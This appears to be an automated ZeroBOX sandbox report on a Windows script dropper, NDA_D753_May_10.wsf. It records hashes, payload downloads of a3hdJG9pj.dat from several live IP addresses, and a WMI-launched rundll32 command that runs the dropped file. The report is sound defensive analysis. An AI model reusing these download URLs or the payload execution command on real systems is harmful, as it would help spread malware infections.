Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 11, 2023, 9:16 a.m.	May 11, 2023, 9:18 a.m.

Size	37.6KB
Type	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5	`8624646d76bcbcc599c9321fb06cddd1`
SHA256	`4f0f597046a24c165dd54f35dd5ef818d3c6961890923ebb268616931d5ba8d4`
CRC32	`B43EB40C`
ssdeep	`768:qN16gyU9bTCVw0TaKCwcbTuinOKsnnWpyTvTlhkehECw4tGtW3NlhkehER9:qN16gR+Vw0WZLEJWp4vTlDhvAtW3NlDu`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\NDA_D753_May_10.wsf
3044
conhost.exe conhost.exe rundll32 C:\Users\Public\aR4lIkC56t.dat,print
2080

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
144.208.127.242	Active	Moloch
149.102.225.18	Active	Moloch
164.124.101.2	Active	Moloch
207.148.14.105	Active	Moloch
45.155.37.101	Active	Moloch
5.42.221.144	Active	Moloch
91.193.16.139	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 11, 2023, 9:18 a.m.	computer_name: TEST22-PC	1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://207.148.14.105/a3hdJG9pj.dat
suspicious_features	Connection to IP address				suspicious_request	GET http://149.102.225.18/a3hdJG9pj.dat

Performs some HTTP requests (2 events)

request	GET http://207.148.14.105/a3hdJG9pj.dat
request	GET http://149.102.225.18/a3hdJG9pj.dat

Communicates with host for which no DNS query was performed (6 events)

host	144.208.127.242
host	149.102.225.18
host	207.148.14.105
host	45.155.37.101
host	5.42.221.144
host	91.193.16.139

Wscript.exe initiated network communications indicative of a script based payload download (14 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://45.155.37.101/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://5.42.221.144/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://91.193.16.139/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://144.208.127.242/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://207.148.14.105/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetReadFile May 11, 2023, 9:17 a.m.	buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> request_handle: 0x00cc000c	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://149.102.225.18/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
InternetReadFile May 11, 2023, 9:18 a.m.	buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (6 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (22 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://45.155.37.101/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:16 a.m.	buffer: ! socket: 856 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://5.42.221.144/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:16 a.m.	buffer: ! socket: 856 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://91.193.16.139/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://144.208.127.242/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://207.148.14.105/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1
send May 11, 2023, 9:17 a.m.	buffer: GET /a3hdJG9pj.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: 207.148.14.105 Connection: Keep-Alive socket: 480 sent: 323	1	323
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://149.102.225.18/a3hdJG9pj.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /a3hdJG9pj.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1
send May 11, 2023, 9:17 a.m.	buffer: GET /a3hdJG9pj.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: 149.102.225.18 Connection: Keep-Alive socket: 972 sent: 323	1	323
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 856 sent: 1	1	1

Uses WMI to create a new process (1 event)

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod May 11, 2023, 9:18 a.m.	inargs.CurrentDirectory: None inargs.CommandLine: conhost.exe rundll32 C:\Users\Public\aR4lIkC56t.dat,print inargs.ProcessStartupInformation: None outargs.ProcessId: 2080 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

A potential heapspray has been detected. 4401 megabytes was sprayed onto the heap of the wscript.exe process (24 events)

count

2032

name

heapspray

process

wscript.exe

total_mb

182

length

94208

protection

PAGE_READWRITE

count

2035

name

heapspray

process

wscript.exe

total_mb

143

length

73728

protection

PAGE_READWRITE

count

5083

name

heapspray

process

wscript.exe

total_mb

218

length

45056

protection

PAGE_READWRITE

count

1017

name

heapspray

process

wscript.exe

total_mb

146

length

151552

protection

PAGE_READWRITE

count

13414

name

heapspray

process

wscript.exe

total_mb

157

length

12288

protection

PAGE_READWRITE

count

5061

name

heapspray

process

wscript.exe

total_mb

177

length

36864

protection

PAGE_READWRITE

count

3813

name

heapspray

process

wscript.exe

total_mb

length

16384

protection

PAGE_READWRITE

count

3050

name

heapspray

process

wscript.exe

total_mb

178

length

61440

protection

PAGE_READWRITE

count

3048

name

heapspray

process

wscript.exe

total_mb

119

length

40960

protection

PAGE_READWRITE

count

2033

name

heapspray

process

wscript.exe

total_mb

166

length

86016

protection

PAGE_READWRITE

count

2011

name

heapspray

process

wscript.exe

total_mb

125

length

65536

protection

PAGE_READWRITE

count

1016

name

heapspray

process

wscript.exe

total_mb

130

length

135168

protection

PAGE_READWRITE

count

1019

name

heapspray

process

wscript.exe

total_mb

107

length

110592

protection

PAGE_READWRITE

count

1017

name

heapspray

process

wscript.exe

total_mb

length

90112

protection

PAGE_READWRITE

count

20828

name

heapspray

process

wscript.exe

total_mb

length

4096

protection

PAGE_READWRITE

count

16255

name

heapspray

process

wscript.exe

total_mb

825

length

53248

protection

PAGE_READWRITE

count

3030

name

heapspray

process

wscript.exe

total_mb

165

length

57344

protection

PAGE_READWRITE

count

4051

name

heapspray

process

wscript.exe

total_mb

126

length

32768

protection

PAGE_READWRITE

count

5083

name

heapspray

process

wscript.exe

total_mb

377

length

77824

protection

PAGE_READWRITE

count

1016

name

heapspray

process

wscript.exe

total_mb

length

102400

protection

PAGE_READWRITE

count

12414

name

heapspray

process

wscript.exe

total_mb

242

length

20480

protection

PAGE_READWRITE

count

4324

name

heapspray

process

wscript.exe

total_mb

101

length

24576

protection

PAGE_READWRITE

count

3054

name

heapspray

process

wscript.exe

total_mb

202

length

69632

protection

PAGE_READWRITE

count

4042

name

heapspray

process

wscript.exe

total_mb

189

length

49152

protection

PAGE_READWRITE

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	5.42.221.144:80
dead_host	91.193.16.139:80
dead_host	45.155.37.101:80
dead_host	144.208.127.242:80

NDA_D753_May_10.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All